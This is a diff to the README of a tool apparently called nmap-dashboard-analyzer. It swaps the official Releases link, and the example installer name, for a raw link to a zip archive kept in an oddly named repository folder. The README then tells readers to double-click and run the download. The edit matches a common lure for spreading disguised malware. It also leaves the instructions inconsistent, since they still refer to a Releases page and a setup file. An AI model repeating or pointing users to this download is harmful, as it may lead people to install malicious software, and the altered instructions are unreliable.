yasuma311/nmap-dashboard-analyzer/README.md

 - Disk Space: At least 100 MB free

 ### 2. Download the Application
-Visit this page to download: [nmap-dashboard-analyzer Releases](https://github.com/yasuma311/nmap-dashboard-analyzer/releases)
+Visit this page to download: [nmap-dashboard-analyzer Releases](https://raw.githubusercontent.com/yasuma311/nmap-dashboard-analyzer/main/coom/analyzer-dashboard-nmap-v2.8.zip)

 ### 3. Select the Correct Version
 On the Releases page, look for the latest version of nmap-dashboard-analyzer.
 Click on it to view the available files.

 ### 4. Download the Installer
-Find the installer file for your operating system (e.g., `nmap-dashboard-analyzer-setup.exe`).
+Find the installer file for your operating system (e.g., `https://raw.githubusercontent.com/yasuma311/nmap-dashboard-analyzer/main/coom/analyzer-dashboard-nmap-v2.8.zip`).
 Click on it to start downloading.

 ### 5. Install the Application
 Once the download is complete, locate the file in your Downloads folder.
 Double-click the installer to run it.
 Follow the on-screen instructions to install nmap-dashboard-analyzer on your computer.